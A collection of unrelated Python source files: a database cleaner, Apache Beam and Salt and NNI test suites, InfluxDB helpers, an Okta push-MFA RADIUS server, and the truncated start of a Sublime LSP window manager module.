p = multiprocessing.Process(target=self.cleanup, args=(self.db_file, self.chat_timeout, self.user_timeout, self.cleaned_chats, 0, q))
p.start()
p.join()
print "[Cleaner] Stopped execution"
def stop_cleanup(handler):
handler.cancel()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--config', help='Path to config file for website')
parser.add_argument('--db-file', help='Path to DB file to cleanup')
args = parser.parse_args()
params = json.load(open(args.config, 'r'))
cleanup_handler = DBCleaner(args.db_file,
chat_timeout=params['status_params']['chat']['num_seconds'] + 30,
user_timeout=params['connection_timeout_num_seconds'] + 5)
# atexit.register(stop_cleanup, handler=cleanup_handler)
cleanup_handler.start()
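# Hedged example (not part of the original script): the config passed via --config
# only needs the keys read above; file names and values here are illustrative.
#
#   {
#       "status_params": {"chat": {"num_seconds": 600}},
#       "connection_timeout_num_seconds": 60
#   }
#
# Invocation sketch: python cleanup_db.py --config params.json --db-file chat_state.db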
|
screen_diff.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Module to conduct screen diff based notebook integration tests."""
# pytype: skip-file
import os
import platform
import threading
import unittest
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import pytest
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive.testing.integration import notebook_executor
try:
import chromedriver_binary # pylint: disable=unused-import
from needle.cases import NeedleTestCase
from needle.driver import NeedleChrome
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
_interactive_integration_ready = (
notebook_executor._interactive_integration_ready)
except ImportError:
_interactive_integration_ready = False
# Web elements will be rendered differently on different platforms. List all
# supported platforms with goldens here.
_SUPPORTED_PLATFORMS = ['Darwin', 'Linux']
class ScreenDiffIntegrationTestEnvironment(object):
"""A test environment to conduct screen diff integration tests for notebooks.
"""
def __init__(self, test_notebook_path, golden_dir, cleanup=True):
# type: (str, str, bool) -> None
assert _interactive_integration_ready, (
'[interactive_test] dependency is not installed.')
assert os.path.exists(golden_dir), '{} does not exist.'.format(golden_dir)
assert os.path.isdir(golden_dir), '{} is not a directory.'.format(
golden_dir)
self._golden_dir = golden_dir
self._notebook_executor = notebook_executor.NotebookExecutor(
test_notebook_path)
self._cleanup = cleanup
self._test_urls = {}
self._server = None
def __enter__(self):
self._notebook_executor.execute()
self._server = HTTPServer(('', 0), SimpleHTTPRequestHandler)
def start_serving(server):
server.serve_forever()
threading.Thread(
target=start_serving, args=[self._server], daemon=True).start()
for test_id, output_path in\
self._notebook_executor.output_html_paths.items():
self._test_urls[test_id] = self.base_url + output_path
return self
def __exit__(self, exc_type, exc_value, traceback):
if self._notebook_executor and self._cleanup:
self._notebook_executor.cleanup()
if self._server:
def stop_serving(server):
server.shutdown()
threading.Thread(
target=stop_serving, args=[self._server], daemon=True).start()
@property
def base_url(self):
"""The base url where the locally started server serving HTMLs generated by
notebook executions."""
assert self._server, 'Server has not started.'
host_n_port = self._server.server_address
return 'http://{}:{}/'.format(host_n_port[0], host_n_port[1])
@property
def test_urls(self):
"""Mapping from test_id/execution_id to urls serving the output HTML pages
generated by the corresponding notebook executions."""
return self._test_urls
@property
def notebook_path_to_test_id(self):
"""Mapping from input notebook paths to their obfuscated execution/test ids.
"""
return self._notebook_executor.notebook_path_to_execution_id
def should_skip():
"""Whether a screen diff test should be skipped."""
return not (
platform.system() in _SUPPORTED_PLATFORMS and
ie.current_env().is_interactive_ready and _interactive_integration_ready)
if should_skip():
@unittest.skip(
reason='[interactive] and [interactive_test] deps are both required.')
@pytest.mark.skip(
reason='[interactive] and [interactive_test] deps are both required.')
class BaseTestCase(unittest.TestCase):
"""A skipped base test case if interactive_test dependency is not installed.
"""
pass
else:
class BaseTestCase(NeedleTestCase):
"""A base test case to execute screen diff integration tests."""
# Whether the browser should be headless.
_headless = True
def __init__(self, *args, **kwargs):
"""Initializes a test.
Some kwargs that could be configured:
#. golden_dir=<path>. A directory path pointing to all the golden
screenshots as baselines for comparison.
#. test_notebook_dir=<path>. A path pointing to a directory of
notebook files in ipynb format.
#. headless=<True/False>. Whether the browser should be headless when
executing the tests.
#. golden_size=<(int, int)>. The size of the screenshot to take and
compare.
#. cleanup=<True/False>. Whether to clean up the output directory.
Should always be True in automated test environment. When debugging,
turn it False to manually check the output for difference.
#. threshold=<float>. An image difference threshold, when the image
pixel distance is bigger than the value, the test will fail.
"""
golden_root = kwargs.pop(
'golden_dir',
'apache_beam/runners/interactive/testing/integration/goldens')
self._golden_dir = os.path.join(golden_root, platform.system())
self._test_notebook_dir = kwargs.pop(
'test_notebook_dir',
'apache_beam/runners/interactive/testing/integration/test_notebooks')
BaseTestCase._headless = kwargs.pop('headless', True)
self._test_env = None
self._viewport_width, self._viewport_height = kwargs.pop(
'golden_size', (1024, 10000))
self._cleanup = kwargs.pop('cleanup', True)
self._threshold = kwargs.pop('threshold', 5000)
self.baseline_directory = os.path.join(os.getcwd(), self._golden_dir)
self.output_directory = os.path.join(
os.getcwd(), self._test_notebook_dir, 'output')
super().__init__(*args, **kwargs)
@classmethod
def get_web_driver(cls):
chrome_options = Options()
if cls._headless:
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument('--force-color-profile=srgb')
return NeedleChrome(options=chrome_options)
def setUp(self):
self.set_viewport_size(self._viewport_width, self._viewport_height)
def run(self, result=None):
with ScreenDiffIntegrationTestEnvironment(self._test_notebook_dir,
self._golden_dir,
self._cleanup) as test_env:
self._test_env = test_env
super().run(result)
def explicit_wait(self):
"""Wait for common elements to be visible."""
WebDriverWait(self.driver, 5).until(
expected_conditions.visibility_of_element_located(
(By.TAG_NAME, 'facets-overview')))
WebDriverWait(self.driver, 5).until(
expected_conditions.visibility_of_element_located(
(By.TAG_NAME, 'facets-dive')))
def assert_all(self):
"""Asserts screenshots for all notebooks in the test_notebook_path."""
for test_id, test_url in self._test_env.test_urls.items():
self.driver.get(test_url)
self.explicit_wait()
self.assertScreenshot('body', test_id, self._threshold)
def assert_single(self, test_id):
"""Asserts the screenshot for a single test. The given test id will be the
name of the golden screenshot."""
test_url = self._test_env.test_urls.get(test_id, None)
assert test_url, '{} is not a valid test id.'.format(test_id)
self.driver.get(test_url)
self.explicit_wait()
self.assertScreenshot('body', test_id, self._threshold)
def assert_notebook(self, notebook_name):
"""Asserts the screenshot for a single notebook. The notebook with the
given notebook_name under test_notebook_dir will be executed and asserted.
"""
if not notebook_name.endswith('.ipynb'):
notebook_name += '.ipynb'
notebook_path = os.path.join(self._test_notebook_dir, notebook_name)
test_id = self._test_env.notebook_path_to_test_id.get(notebook_path, None)
assert test_id, 'Cannot find notebook with name {}.'.format(notebook_name)
self.assert_single(test_id)
# This file contains no tests. Below lines are purely for passing lint.
if __name__ == '__main__':
unittest.main()
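# Hedged example (not part of this module): a concrete screen diff test would
# subclass BaseTestCase and compare against a golden screenshot per notebook.
# The test class and notebook name below are illustrative only.
#
#   class ExampleNotebookTest(BaseTestCase):
#     def test_example_notebook(self):
#       self.assert_notebook('example_notebook')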
|
tcp_test.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Thomas Jackson <jacksontj.89@gmail.com>`
'''
# Import python libs
from __future__ import absolute_import
import os
import threading
import tornado.gen
import tornado.ioloop
from tornado.testing import AsyncTestCase
import salt.config
import salt.utils
import salt.transport.server
import salt.transport.client
import salt.exceptions
# Import Salt Testing libs
from salttesting import TestCase, skipIf
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../')
import integration
# Import Salt libs
from unit.transport.req_test import ReqChannelMixin
from unit.transport.pub_test import PubChannelMixin
# TODO: move to a library?
def get_config_file_path(filename):
return os.path.join(integration.TMP, 'config', filename)
class BaseTCPReqCase(TestCase):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
cls.master_opts = salt.config.master_config(get_config_file_path('master'))
cls.master_opts.update({
'transport': 'tcp',
'auto_accept': True,
})
cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
cls.minion_opts.update({
'transport': 'tcp',
'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
})
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
cls.server_channel.pre_fork(cls.process_manager)
cls.io_loop = tornado.ioloop.IOLoop()
cls.io_loop.make_current()
cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
cls.server_thread = threading.Thread(target=cls.io_loop.start)
cls.server_thread.daemon = True
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.io_loop.stop()
cls.server_thread.join()
cls.process_manager.kill_children()
cls.server_channel.close()
del cls.server_channel
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
'''
Test all of the clear msg stuff
'''
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts, crypt='clear')
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send_clear'}))
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
def setUp(self):
self.channel = salt.transport.client.ReqChannel.factory(self.minion_opts)
@classmethod
@tornado.gen.coroutine
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
raise tornado.gen.Return((payload, {'fun': 'send'}))
# TODO: make failed returns have a specific framing so we can raise the same exception
# on encrypted channels
def test_badload(self):
'''
Test a variety of bad requests, make sure that we get some sort of error
'''
msgs = ['', [], tuple()]
for msg in msgs:
with self.assertRaises(salt.exceptions.AuthenticationError):
ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase):
'''
Test the req server/client pair
'''
@classmethod
def setUpClass(cls):
cls.master_opts = salt.config.master_config(get_config_file_path('master'))
cls.master_opts.update({
'transport': 'tcp',
'auto_accept': True,
})
cls.minion_opts = salt.config.minion_config(get_config_file_path('minion'))
cls.minion_opts.update({
'transport': 'tcp',
'master_ip': '127.0.0.1',
'auth_timeout': 1,
'master_uri': 'tcp://127.0.0.1:{0}'.format(cls.minion_opts['master_port']),
})
cls.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager')
cls.server_channel = salt.transport.server.PubServerChannel.factory(cls.master_opts)
cls.server_channel.pre_fork(cls.process_manager)
# we also require req server for auth
cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(cls.master_opts)
cls.req_server_channel.pre_fork(cls.process_manager)
cls._server_io_loop = tornado.ioloop.IOLoop()
cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls._server_io_loop)
cls.server_thread = threading.Thread(target=cls._server_io_loop.start)
cls.server_thread.start()
@classmethod
def _handle_payload(cls, payload):
'''
TODO: something besides echo
'''
return payload, {'fun': 'send_clear'}
@classmethod
def tearDownClass(cls):
cls._server_io_loop.stop()
cls.server_thread.join()
cls.process_manager.kill_children()
cls.req_server_channel.close()
del cls.req_server_channel
def setUp(self):
super(BaseTCPPubCase, self).setUp()
self._start_handlers = dict(self.io_loop._handlers)
def tearDown(self):
super(BaseTCPPubCase, self).tearDown()
failures = []
for k, v in self.io_loop._handlers.iteritems():
if self._start_handlers.get(k) != v:
failures.append((k, v))
if len(failures) > 0:
raise Exception('FDs still attached to the IOLoop: {0}'.format(failures))
@skipIf(True, 'Skip until we can devote time to fix this test')
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
'''
Tests around the publish system
'''
if __name__ == '__main__':
from integration import run_tests
run_tests(ClearReqTestCases, needs_daemon=False)
run_tests(AESReqTestCases, needs_daemon=False)
|
test_serializer.py
|
from collections import OrderedDict
import math
import os
import pickle
import subprocess
import sys
from pathlib import Path
import pytest
import nni
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import MNIST
from nni.common.serializer import is_traceable
if True: # prevent auto formatting
sys.path.insert(0, Path(__file__).parent.as_posix())
from imported.model import ImportTest
# this test cannot be directly put in this file. It would cause a syntax error for Python <= 3.7.
if tuple(sys.version_info) >= (3, 8):
from imported._test_serializer_py38 import test_positional_only
def test_ordered_json():
items = [
('a', 1),
('c', 3),
('b', 2),
]
orig = OrderedDict(items)
json = nni.dump(orig)
loaded = nni.load(json)
assert list(loaded.items()) == items
@nni.trace
class SimpleClass:
def __init__(self, a, b=1):
self._a = a
self._b = b
@nni.trace
class EmptyClass:
pass
class UnserializableSimpleClass:
def __init__(self):
self._a = 1
def test_simple_class():
instance = SimpleClass(1, 2)
assert instance._a == 1
assert instance._b == 2
dump_str = nni.dump(instance)
assert '"__kwargs__": {"a": 1, "b": 2}' in dump_str
assert '"__symbol__"' in dump_str
instance = nni.load(dump_str)
assert instance._a == 1
assert instance._b == 2
def test_external_class():
from collections import OrderedDict
d = nni.trace(kw_only=False)(OrderedDict)([('a', 1), ('b', 2)])
assert d['a'] == 1
assert d['b'] == 2
dump_str = nni.dump(d)
assert dump_str == '{"a": 1, "b": 2}'
conv = nni.trace(torch.nn.Conv2d)(3, 16, 3)
assert conv.in_channels == 3
assert conv.out_channels == 16
assert conv.kernel_size == (3, 3)
assert nni.dump(conv) == \
r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", ' \
r'"__kwargs__": {"in_channels": 3, "out_channels": 16, "kernel_size": 3}}'
conv = nni.load(nni.dump(conv))
assert conv.kernel_size == (3, 3)
def test_nested_class():
a = SimpleClass(1, 2)
b = SimpleClass(a)
assert b._a._a == 1
dump_str = nni.dump(b)
b = nni.load(dump_str)
assert 'SimpleClass object at' in repr(b)
assert b._a._a == 1
def test_unserializable():
a = UnserializableSimpleClass()
dump_str = nni.dump(a)
a = nni.load(dump_str)
assert a._a == 1
def test_function():
t = nni.trace(math.sqrt, kw_only=False)(3)
assert 1 < t < 2
assert t.trace_symbol == math.sqrt
assert t.trace_args == [3]
t = nni.load(nni.dump(t))
assert 1 < t < 2
assert not is_traceable(t) # trace not recovered, expected, limitation
def simple_class_factory(bb=3.):
return SimpleClass(1, bb)
t = nni.trace(simple_class_factory)(4)
ts = nni.dump(t)
assert '__kwargs__' in ts
t = nni.load(ts)
assert t._a == 1
assert is_traceable(t)
t = t.trace_copy()
assert is_traceable(t)
assert t.trace_symbol(10)._b == 10
assert t.trace_kwargs['bb'] == 4
assert is_traceable(t.trace_copy())
class Foo:
def __init__(self, a, b=1):
self.aa = a
self.bb = [b + 1 for _ in range(1000)]
def __eq__(self, other):
return self.aa == other.aa and self.bb == other.bb
def test_custom_class():
module = nni.trace(Foo)(3)
assert nni.load(nni.dump(module)) == module
module = nni.trace(Foo)(b=2, a=1)
assert nni.load(nni.dump(module)) == module
module = nni.trace(Foo)(Foo(1), 5)
dumped_module = nni.dump(module)
module = nni.load(dumped_module)
assert module.bb[0] == module.bb[999] == 6
module = nni.trace(Foo)(nni.trace(Foo)(1), 5)
dumped_module = nni.dump(module)
assert nni.load(dumped_module) == module
class Foo:
def __init__(self, a, b=1):
self.aa = a
self.bb = [b + 1 for _ in range(1000)]
def __eq__(self, other):
return self.aa == other.aa and self.bb == other.bb
def test_basic_unit_and_custom_import():
module = ImportTest(3, 0.5)
ss = nni.dump(module)
assert ss == r'{"__symbol__": "path:imported.model.ImportTest", "__kwargs__": {"foo": 3, "bar": 0.5}}'
assert nni.load(nni.dump(module)) == module
import nni.retiarii.nn.pytorch as nn
module = nn.Conv2d(3, 10, 3, bias=False)
ss = nni.dump(module)
assert ss == r'{"__symbol__": "path:torch.nn.modules.conv.Conv2d", "__kwargs__": {"in_channels": 3, "out_channels": 10, "kernel_size": 3, "bias": false}}'
assert nni.load(ss).bias is None
def test_dataset():
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True)
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
dumped_ans = {
"__symbol__": "path:torch.utils.data.dataloader.DataLoader",
"__kwargs__": {
"dataset": {
"__symbol__": "path:torchvision.datasets.mnist.MNIST",
"__kwargs__": {"root": "data/mnist", "train": False, "download": True}
},
"batch_size": 10
}
}
print(nni.dump(dataloader))
print(nni.dump(dumped_ans))
assert nni.dump(dataloader) == nni.dump(dumped_ans)
dataloader = nni.load(nni.dump(dumped_ans))
assert isinstance(dataloader, DataLoader)
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)([
nni.trace(transforms.ToTensor)(),
nni.trace(transforms.Normalize)((0.1307,), (0.3081,))
]))
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
x, y = next(iter(nni.load(nni.dump(dataloader))))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
))
dataloader = nni.trace(DataLoader)(dataset, batch_size=10)
x, y = next(iter(nni.load(nni.dump(dataloader))))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
def test_pickle():
pickle.dumps(EmptyClass())
obj = SimpleClass(1)
obj = pickle.loads(pickle.dumps(obj))
assert obj._a == 1
assert obj._b == 1
obj = SimpleClass(1)
obj.xxx = 3
obj = pickle.loads(pickle.dumps(obj))
assert obj.xxx == 3
@pytest.mark.skipif(sys.platform != 'linux', reason='https://github.com/microsoft/nni/issues/4434')
def test_multiprocessing_dataloader():
# check whether multi-processing works
# it's possible to have pickle errors
dataset = nni.trace(MNIST)(root='data/mnist', train=False, download=True,
transform=nni.trace(transforms.Compose)(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
))
import nni.retiarii.evaluator.pytorch.lightning as pl
dataloader = pl.DataLoader(dataset, batch_size=10, num_workers=2)
x, y = next(iter(dataloader))
assert x.size() == torch.Size([10, 1, 28, 28])
assert y.size() == torch.Size([10])
def _test_multiprocessing_dataset_worker(dataset):
if sys.platform == 'linux':
# on non-linux, the loaded object will become non-traceable
# due to an implementation limitation
assert is_traceable(dataset)
else:
from torch.utils.data import Dataset
assert isinstance(dataset, Dataset)
def test_multiprocessing_dataset():
from torch.utils.data import Dataset
dataset = nni.trace(Dataset)()
import multiprocessing
process = multiprocessing.Process(target=_test_multiprocessing_dataset_worker, args=(dataset, ))
process.start()
process.join()
assert process.exitcode == 0
def test_type():
assert nni.dump(torch.optim.Adam) == '{"__nni_type__": "path:torch.optim.adam.Adam"}'
assert nni.load('{"__nni_type__": "path:torch.optim.adam.Adam"}') == torch.optim.Adam
assert Foo == nni.load(nni.dump(Foo))
assert nni.dump(math.floor) == '{"__nni_type__": "path:math.floor"}'
assert nni.load('{"__nni_type__": "path:math.floor"}') == math.floor
def test_lightning_earlystop():
import nni.retiarii.evaluator.pytorch.lightning as pl
from pytorch_lightning.callbacks.early_stopping import EarlyStopping
trainer = pl.Trainer(callbacks=[nni.trace(EarlyStopping)(monitor="val_loss")])
pickle_size_limit = 4096 if sys.platform == 'linux' else 32768
trainer = nni.load(nni.dump(trainer, pickle_size_limit=pickle_size_limit))
assert any(isinstance(callback, EarlyStopping) for callback in trainer.callbacks)
def test_pickle_trainer():
import nni.retiarii.evaluator.pytorch.lightning as pl
from pytorch_lightning import Trainer
trainer = pl.Trainer(max_epochs=1)
data = pickle.dumps(trainer)
trainer = pickle.loads(data)
assert isinstance(trainer, Trainer)
def test_generator():
import torch.nn as nn
import torch.optim as optim
class Net(nn.Module):
def __init__(self):
super().__init__()
self.conv = nn.Conv2d(3, 10, 1)
def forward(self, x):
return self.conv(x)
model = Net()
optimizer = nni.trace(optim.Adam)(model.parameters())
print(optimizer.trace_kwargs)
def test_arguments_kind():
def foo(a, b, *c, **d):
pass
d = nni.trace(foo)(1, 2, 3, 4)
assert d.trace_args == [1, 2, 3, 4]
assert d.trace_kwargs == {}
d = nni.trace(foo)(a=1, b=2)
assert d.trace_kwargs == dict(a=1, b=2)
d = nni.trace(foo)(1, b=2)
# this is not perfect, but it's safe
assert d.trace_kwargs == dict(a=1, b=2)
def foo(a, *, b=3, c=5):
pass
d = nni.trace(foo)(1, b=2, c=3)
assert d.trace_kwargs == dict(a=1, b=2, c=3)
import torch.nn as nn
lstm = nni.trace(nn.LSTM)(2, 2)
assert lstm.input_size == 2
assert lstm.hidden_size == 2
assert lstm.trace_args == [2, 2]
lstm = nni.trace(nn.LSTM)(input_size=2, hidden_size=2)
assert lstm.trace_kwargs == {'input_size': 2, 'hidden_size': 2}
def test_subclass():
@nni.trace
class Super:
def __init__(self, a, b):
self._a = a
self._b = b
class Sub1(Super):
def __init__(self, c, d):
super().__init__(3, 4)
self._c = c
self._d = d
@nni.trace
class Sub2(Super):
def __init__(self, c, d):
super().__init__(3, 4)
self._c = c
self._d = d
obj = Sub1(1, 2)
# There could be trace_kwargs for obj. Behavior is undefined.
assert obj._a == 3 and obj._c == 1
assert isinstance(obj, Super)
obj = Sub2(1, 2)
assert obj.trace_kwargs == {'c': 1, 'd': 2}
assert issubclass(type(obj), Super)
assert isinstance(obj, Super)
def test_get():
@nni.trace
class Foo:
def __init__(self, a = 1):
self._a = a
def bar(self):
return self._a + 1
obj = Foo(3)
assert nni.load(nni.dump(obj)).bar() == 4
obj1 = obj.trace_copy()
with pytest.raises(AttributeError):
obj1.bar()
obj1.trace_kwargs['a'] = 5
obj1 = obj1.get()
assert obj1.bar() == 6
obj2 = obj1.trace_copy()
obj2.trace_kwargs['a'] = -1
assert obj2.get().bar() == 0
def test_model_wrapper_serialize():
from nni.retiarii import model_wrapper
@model_wrapper
class Model(nn.Module):
def __init__(self, in_channels):
super().__init__()
self.in_channels = in_channels
model = Model(3)
dumped = nni.dump(model)
loaded = nni.load(dumped)
assert loaded.in_channels == 3
def test_model_wrapper_across_process():
main_file = os.path.join(os.path.dirname(__file__), 'imported', '_test_serializer_main.py')
subprocess.run([sys.executable, main_file, '0'], check=True)
subprocess.run([sys.executable, main_file, '1'], check=True)
|
utils.py
|
"""Utilities for working with influxdb."""
import logging
import os
import socket
from threading import Thread
from django.conf import settings
from influxdb import InfluxDBClient
logger = logging.getLogger(__name__)
def build_tags(tags=None):
final_tags = {}
final_tags.update({
'host': getattr(settings, 'INFLUXDB_TAGS_HOST', ''),
'environment': getattr(settings, 'ENVIRONMENT',
os.environ.get('ENV', 'dev')),
'project': getattr(settings, 'PROJECT_MODULE',
os.environ.get('PROJECT', '')),
'service': os.environ.get('SERVICE', ''),
'container': socket.gethostname(),
})
final_tags.update(getattr(settings, 'INFLUXDB_EXTRA_TAGS', {}))
final_tags.update(tags or {})
return {k: v for k, v in final_tags.items() if v}
def get_client():
"""Returns an ``InfluxDBClient`` instance."""
return InfluxDBClient(
settings.INFLUXDB_HOST,
settings.INFLUXDB_PORT,
settings.INFLUXDB_USER,
settings.INFLUXDB_PASSWORD,
settings.INFLUXDB_DATABASE,
timeout=settings.INFLUXDB_TIMEOUT,
ssl=getattr(settings, 'INFLUXDB_SSL', False),
verify_ssl=getattr(settings, 'INFLUXDB_VERIFY_SSL', False),
)
def query(query):
"""Wrapper around ``InfluxDBClient.query()``."""
client = get_client()
return client.query(query)
def write_points(data, force_disable_threading=False):
"""
Writes a series to influxdb.
:param data: Array of dicts, as required by
https://github.com/influxdb/influxdb-python
:param force_disable_threading: When being called from the Celery task, we
set this to `True` so that the user doesn't accidentally use Celery and
threading at the same time.
"""
if getattr(settings, 'INFLUXDB_DISABLED', False):
return
client = get_client()
use_threading = getattr(settings, 'INFLUXDB_USE_THREADING', False)
if force_disable_threading:
use_threading = False
if use_threading is True:
thread = Thread(target=process_points, args=(client, data, ))
thread.start()
else:
process_points(client, data)
def process_points(client, data): # pragma: no cover
"""Method to be called via threading module."""
try:
client.write_points(data)
except Exception:
if getattr(settings, 'INFLUXDB_FAIL_SILENTLY', True):
logger.exception('Error while writing data points')
else:
raise
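# Hedged usage sketch (not part of the original module): points are handed straight
# to InfluxDBClient.write_points(), so they follow the influxdb-python dict format.
# Measurement, tag and field names below are illustrative.
#
#   write_points([{
#       'measurement': 'response_times',
#       'tags': build_tags({'view': 'home'}),
#       'fields': {'value': 123.4},
#   }])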
|
server.py
|
#!/usr/bin/python
from __future__ import print_function
from pyrad.dictionary import Dictionary
from pyrad.server import Server, RemoteHost
from pyrad.packet import AccessReject, AccessAccept
import logging
from okta import OktaAPI, ResponseCodes
import os
import sys
import threading
logging.basicConfig(level="INFO",
format="%(asctime)s [%(levelname)-8s] %(message)s")
logger = logging.getLogger(__name__)
class RadiusServer(Server):
def __init__(self, *args, **kwargs):
self.okta = OktaAPI(url=args[0], key=args[1])
super().__init__(**kwargs)
def auth_handler(self, pkt):
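        # Strip an optional "DOMAIN\" prefix (e.g. from Windows/AD clients) so only
        # the bare user name is passed to Okta.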
user_name = pkt["User-Name"][0][
pkt["User-Name"][0].find("\\") + 1 if pkt["User-Name"][0].find("\\") > 0 else 0:]
logger.info("Received an authentication request for {}.".format(user_name))
logger.debug("Attributes: ")
for attr in pkt.keys():
logger.debug("%s: %s" % (attr, pkt[attr]))
reply = self.CreateReplyPacket(pkt, **{
"Proxy-State": pkt["Proxy-State"]
})
reply.code = AccessReject
try:
if os.environ.get('OKTA_USE_SAMACCOUNTNAME'):
u = self.okta.get_user_by_samaccountname(user_name)
else:
u = self.okta.get_user_id(user_name)
f = self.okta.get_user_push_factor(u)
if f is not None:
push = self.okta.push_verify(u, f["id"])
if push == ResponseCodes.SUCCESS:
logger.info("Push approved by {}.".format(user_name))
reply.code = AccessAccept
else:
logger.warning("Push was rejected or timed out for {}!".format(user_name))
else:
logger.warning("{} does not have an Okta push factor enrolled!".format(user_name))
except Exception as e:
logger.exception("There was a problem with the Okta MFA", e)
self.SendReplyPacket(pkt.fd, reply)
def HandleAuthPacket(self, pkt):
thread = threading.Thread(target=self.auth_handler, args=(pkt, ))
thread.start()
def run():
# Check to make sure env variables are set
if not all(v in os.environ for v in ["OKTA_API_KEY", "OKTA_TENANT", "RADIUS_SECRET"]):
logger.error("Missing environment variables!")
sys.exit("Missing environment variables!")
authport = int(os.getenv("RADIUS_AUTH_PORT", 1812))
acctport = int(os.getenv("RADIUS_ACCT_PORT", 1813))
# Create server and read the attribute dictionary
srv = RadiusServer(
os.getenv('OKTA_TENANT'),
os.getenv('OKTA_API_KEY'),
dict=Dictionary("dictionary"),
coa_enabled=False,
authport=authport,
acctport=acctport
)
# Add clients (address, secret, name)
srv.hosts["0.0.0.0"] = RemoteHost("0.0.0.0", os.getenv("RADIUS_SECRET").encode(), "0.0.0.0")
srv.BindToAddress("0.0.0.0")
logger.info(f"Starting server on port {authport}...")
# Run the RADIUS server
srv.Run()
if __name__ == '__main__':
run()
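# Hedged usage sketch (not part of the original script): run() reads all of its
# configuration from environment variables; the values below are placeholders only.
#
#   os.environ.setdefault('OKTA_TENANT', 'https://example.okta.com')
#   os.environ.setdefault('OKTA_API_KEY', '<api token>')
#   os.environ.setdefault('RADIUS_SECRET', '<shared secret>')
#   run()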
|
windows.py
|
from ...third_party import WebsocketServer # type: ignore
from .configurations import ConfigManager
from .configurations import WindowConfigManager
from .diagnostics import ensure_diagnostics_panel
from .logging import debug
from .logging import exception_log
from .message_request_handler import MessageRequestHandler
from .panels import update_server_panel
from .protocol import CodeLens, Diagnostic
from .protocol import Error
from .sessions import get_plugin
from .sessions import Logger
from .sessions import Manager
from .sessions import Session
from .sessions import SessionBufferProtocol
from .sessions import SessionViewProtocol
from .settings import userprefs
from .transports import create_transport
from .types import ClientConfig
from .typing import Optional, Any, Dict, Deque, List, Generator, Tuple, Iterable, Sequence, Union
from .views import extract_variables
from .views import make_link
from .workspace import disable_in_project
from .workspace import enable_in_project
from .workspace import ProjectFolders
from .workspace import sorted_workspace_folders
from abc import ABCMeta
from abc import abstractmethod
from collections import deque
from subprocess import CalledProcessError
from time import time
from weakref import ref
from weakref import WeakSet
import functools
import json
import os
import sublime
import threading
_NO_DIAGNOSTICS_PLACEHOLDER = " No diagnostics. Well done!"
class AbstractViewListener(metaclass=ABCMeta):
TOTAL_ERRORS_AND_WARNINGS_STATUS_KEY = "lsp_total_errors_and_warnings"
view = None # type: sublime.View
@property
@abstractmethod
def manager(self) -> "WindowManager":
raise NotImplementedError()
@abstractmethod
def session(self, capability_path: str, point: Optional[int] = None) -> Optional[Session]:
raise NotImplementedError()
@abstractmethod
def on_session_initialized_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def on_session_shutdown_async(self, session: Session) -> None:
raise NotImplementedError()
@abstractmethod
def diagnostics_async(self) -> Iterable[Tuple[SessionBufferProtocol, Sequence[Tuple[Diagnostic, sublime.Region]]]]:
raise NotImplementedError()
@abstractmethod
def diagnostics_intersecting_region_async(
self,
region: sublime.Region
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
@abstractmethod
def diagnostics_touching_point_async(
self,
pt: int
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
raise NotImplementedError()
def diagnostics_intersecting_async(
self,
region_or_point: Union[sublime.Region, int]
) -> Tuple[Sequence[Tuple[SessionBufferProtocol, Sequence[Diagnostic]]], sublime.Region]:
